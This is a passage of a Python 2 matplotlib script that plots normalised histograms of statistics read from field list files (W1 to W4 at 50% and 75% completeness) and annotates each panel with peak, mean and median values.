n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,14)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{M^3}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 12
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
# --- Panel 16 (grid 4x5, position 16): statistic in input column 25 ---
cols=25
# Load column `cols` for each field (W1-W4) at 50% and 75% completeness,
# then keep only values below the q < 10 outlier cut.
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
# KDE smoothers; only consumed by the commented-out annotation variants below.
x = linspace(0,3,500)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
plt.subplot(4,5,16)
rangemax=8
# First pass captures the bin counts/edges used by the annotations below.
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# NOTE(review): this second pass redraws identical histograms and duplicates
# the legend labels -- looks redundant; confirm before removing.
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)
ax=plt.subplot(4,5,16)
# Annotate "peak,mean,median" per field; peak = left edge of the fullest bin.
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'${\zeta_\frac{M_{rms}^2}{r}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 13
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=27
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
x = linspace(0,3,500)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
plt.subplot(4,5,17)
rangemax=8
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,17)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='r',transform=ax.transAxes)
plt.xlabel(r'${\zeta_\frac{M_{rms}^3}{r}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 14
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
# --- Panel 18 (grid 4x5, position 18): statistic in input column 29 ---
cols=29
# Load column `cols` for each field (W1-W4) at 50% and 75% completeness,
# then keep only values below the q < 10 outlier cut.
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,18)
rangemax=7
# First pass captures the bin counts/edges used by the annotations below.
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# NOTE(review): this second pass redraws identical histograms -- looks
# redundant; confirm before removing.
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,18)
# Annotate "peak,mean,median" per field; peak = left edge of the fullest bin,
# so only the peak depends on the binning.
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
